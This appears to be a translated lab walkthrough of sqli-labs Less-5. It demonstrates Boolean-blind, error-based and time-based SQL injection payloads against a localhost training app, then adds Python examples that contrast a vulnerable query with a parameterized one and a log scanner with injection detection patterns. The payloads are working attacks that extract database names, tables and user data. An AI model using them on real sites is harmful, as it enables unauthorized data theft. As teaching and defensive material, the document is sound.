A note first: many blogs have translated or copied this material. The correct approach for this level is blind injection. As you can see from the source code, when the query succeeds the page only reveals whether data was returned, not the data itself, so the method from Less 1-4 cannot be used here.
Starting from this level we study blind injection. Combining the information in Background-2, the payloads listed there are demonstrated below.
- Try left(database(),1)
http://127.0.0.1/sqllib/Less-5/?id=1%27and%20left(version(),1)=5%23
Look at version(): the database version is 5.6.17. The statement here asks whether the first digit of the version number is 5, which is obviously true, so the page returns normally.
When the version number is wrong, the page does not display normally.
Next, look at the length of the database name:
http://127.0.0.1/sqllib/Less-5/?id=1%27and%20length(database())=8%23
When the length is 8 the page returns normally, which shows that the length is 8.
Guess the first character of the database name:
http://127.0.0.1/sqllib/Less-5/?id=1%27and%20left(database(),1)%3e%27a%27--+
database() is security, so we test whether its first character is > 'a'; obviously s > a, so the page returns normally. When we do not know the character, binary search (dichotomy) improves the efficiency of the injection.
Guess the second character of the database name:
Knowing that the first character is s, we test whether the first two characters are greater than 'sa':
http://127.0.0.1/sqllib/Less-5/?id=1%27and%20left(database(),2)%3e%27sa%27--+
Please extrapolate from here. Someone asked how to carry out the second and third positions, so this is explained only this once and will not be repeated later; you need the ability and habit of thinking for yourself.
- Try the substr() and ascii() functions
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101
Knowing that the database name is security, we use this method to obtain the tables under the security database.
Get the first character of the first table in the security database:
http://127.0.0.1/sqllib/Less-5/?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))%3e80--+
PS: here table_schema can be written as ='security', but we use database() because database() is security. The same binary-search test is done here until the result is correct.
This should be 101, because the first table is email.
How do we get the second character of the first table?
We have already learned about the substr() function: substr(**,2,1) can be used.
http://127.0.0.1/sqllib/Less-5/?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),2,1))%3e108--+
How do we get the second table? Think about it!
Look at the limit 0,1 used in the statement above. It means: start from entry 0 and take one entry. For the second table it is limit 1,1!
http://127.0.0.1/sqllib/Less-5/?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),1,1))%3e113--+
Here >113 returns normally, because the second table is referers, so its first character is r.
The following process just repeats the above; there is no need to reinvent the wheel here, since the principle has been explained clearly.
Once you have finished this method, you will have the names of all the tables.
- (2) Use regexp to get the columns in the users table
http://127.0.0.1/sqllib/Less-5/?id=1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20column_name%20regexp%20%27^us[a-z]%27%20limit%200,1)--+
The statement above checks whether the users table has a column whose name starts with us**.
http://127.0.0.1/sqllib/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)--+
You can see that username exists. We can replace username with other names such as password.
- Get the contents of the users table using the ord() and mid() functions
http://127.0.0.1/sqllib/Less-5/?id=1%27%20and%20ord(mid((select%20ifnull(cast(username%20as%20char),0x20)%20from%20security.users%20order%20by%20id%20limit%200,1),1,1))=68--+
This gets the contents of the users table: it takes the ASCII code of the first character of the first row of username and compares it with 68, which is D. And we know from the table that the first row of data is Dumb. The rest is again a matter of repeating the process.
Summary: in (1) to (4) above we have demonstrated all the Boolean-blind payloads, each with a different statement. Work through these instances to become familiar with and understand Boolean-blind SQL statements.
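To make the Boolean oracle concrete from the defender's side, here is an added example (not part of the original post and not sqli-labs code) that reproduces the Less-5 pattern in Python with an in-memory SQLite database: a page that concatenates `id` into the query, and the same page with a bound parameter. The users rows, the `page_vulnerable`/`page_fixed` functions and the two probe strings are constructed for this example; MySQL's `left()`/`ascii()` are written with SQLite's `substr()`/`unicode()` equivalents, and a subquery on the users table stands in for `database()`.

```python
import sqlite3

# Constructed sample rows standing in for the lab's security.users table.
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")]


def make_db():
    """In-memory SQLite database with a small users table (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return con


def page_vulnerable(con, id_param):
    """Mimics the Less-5 pattern: the id parameter is pasted into the SQL text.
    Returns True for 'You are in...' (a row came back) and False otherwise;
    that one bit is the only thing the page reveals."""
    sql = "SELECT * FROM users WHERE id='%s' LIMIT 0,1" % id_param
    return con.execute(sql).fetchone() is not None


def page_fixed(con, id_param):
    """Same page logic with a bound parameter: the input is a value, never SQL."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return con.execute(sql, (id_param,)).fetchone() is not None


# Two probes in the style of the article (constructed). The condition asks
# whether the first character of the first username is 'D' (68) or 'E' (69);
# the trailing '--' comments out the rest of the original statement.
PROBE_TRUE = "1' and unicode(substr((select username from users limit 1),1,1))=68--"
PROBE_FALSE = "1' and unicode(substr((select username from users limit 1),1,1))=69--"


def oracle_results(con):
    """Run both probes against both versions of the page."""
    return {
        "vuln_true": page_vulnerable(con, PROBE_TRUE),
        "vuln_false": page_vulnerable(con, PROBE_FALSE),
        "fixed_true": page_fixed(con, PROBE_TRUE),
        "fixed_false": page_fixed(con, PROBE_FALSE),
    }


if __name__ == "__main__":
    db = make_db()
    print(oracle_results(db))          # vuln: True/False, fixed: False/False
    print(page_fixed(db, "1"))         # a normal request still works: True
```

The vulnerable page answers True for the probe whose condition holds and False for the other, which is exactly the one-bit oracle the article extracts characters with. The parameterized page answers False for both probes, because the whole probe string is compared against `id` as a single value rather than parsed as SQL, while a plain `id=1` still returns the row.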
Next, we demonstrate error-based injection and time-based injection.
(5) First, error-based injection
http://127.0.0.1/sqllib/Less-5/?id=1' union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+
Error-based injection with a double-type numeric out-of-range value:
http://127.0.0.1/sqllib/Less-5/?id=1' union select (exp(~(select * from (select user())a))),2,3--+
Error-based injection with a bigint overflow:
http://127.0.0.1/sqllib/Less-5/?id=1' union select (!(select * from (select user())x)-~0),2,3--+
Error-based injection with the XPath functions:
http://127.0.0.1/sqllib/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+
http://127.0.0.1/sqllib/Less-5/?id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)--+
Exploiting duplicate data (duplicate column names):
http://127.0.0.1/sqllib/Less-5/?id=1' union select * from (select name_const(version(),1),name_const(version(),1))x--+
- Time-based injection
Injection using the sleep() function:
http://127.0.0.1/sqllib/Less-5/?id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(5))--+
When the condition is false, there is a 5-second delay.
Time-based injection with benchmark():
http://127.0.0.1/sqllib/Less-5/?id=1' union select (if(substring(current,1,1)=char(115),benchmark(50000000,encode('msg','by 5 seconds')),null)),2,3 from (select database() as current) as tb1--+
When the condition is true, encode('msg','by 5 seconds') is executed 50 million times, which takes a while.
At this point, we have demonstrated all of the blind-injection methods described above in Less-5. In the subsequent levels only one will be picked for the demonstration; for the other blind methods, please refer back to Less-5.
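As an added defender-side example (not from the original post), the following Python scans web-server access-log lines for the MySQL function families used on this page and tags each suspicious request as Boolean-blind, error-based or time-based. The log lines are constructed for the example and mirror the request shapes shown above; the pattern groups, the `SQL_CONTEXT` requirement and the function names are the example's own design, not a standard ruleset. Requests are URL-decoded first because the payloads arrive encoded (`%27`, `%20`, `--+`).

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined format, trimmed); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqllib/Less-5/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqllib/Less-5/?id=1%27and%20left(database(),1)%3e%27a%27--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqllib/Less-5/?id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20@@version),0x7e))--+ HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /sqllib/Less-5/?id=1%27%20and%20if(ascii(substr(database(),1,1))=115,1,sleep(5))--+ HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:10 +0000] "GET /search?q=left+handed+keyboards HTTP/1.1" 200 2048
"""

# Function families from the article, grouped by the technique they signal.
# A function name must be followed by '(' so that ordinary words do not match.
PATTERNS = {
    "boolean-blind": re.compile(r"\b(left|substr|substring|mid|ascii|ord)\s*\(", re.I),
    "error-based": re.compile(r"\b(extractvalue|updatexml|name_const|exp|floor)\s*\(", re.I),
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
}

# A function name alone is weak evidence; also require SQL context such as a
# quote, a comment marker or a boolean/union/select keyword in the decoded URL.
SQL_CONTEXT = re.compile(r"('|--|#|\band\b|\bor\b|\bunion\b|\bselect\b)", re.I)

# Pull the request target out of a combined-format log line.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) ')


def classify_request(url):
    """Return the list of technique tags that apply to one request URL."""
    decoded = unquote_plus(url)          # %27 -> ', %20 -> space, --+ -> '-- '
    if not SQL_CONTEXT.search(decoded):
        return []
    return [name for name, pat in PATTERNS.items() if pat.search(decoded)]


def scan_log(text):
    """Return (url, tags) for every log line that carries a tagged request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        tags = classify_request(m.group(1))
        if tags:
            hits.append((m.group(1), tags))
    return hits


if __name__ == "__main__":
    for url, tags in scan_log(SAMPLE_LOG):
        print(", ".join(tags), "->", unquote_plus(url))
```

Run against the sample log, the plain `id=1` request and the `left handed keyboards` search are left alone, the `left(database(),1)` probe is tagged Boolean-blind, the `extractvalue` request error-based, and the `if(...sleep(5))` request both Boolean-blind and time-based. For a time-based family in production, pairing this with the response-time field of the log (when the server records it) separates a real delay from a probe that merely contains the function name.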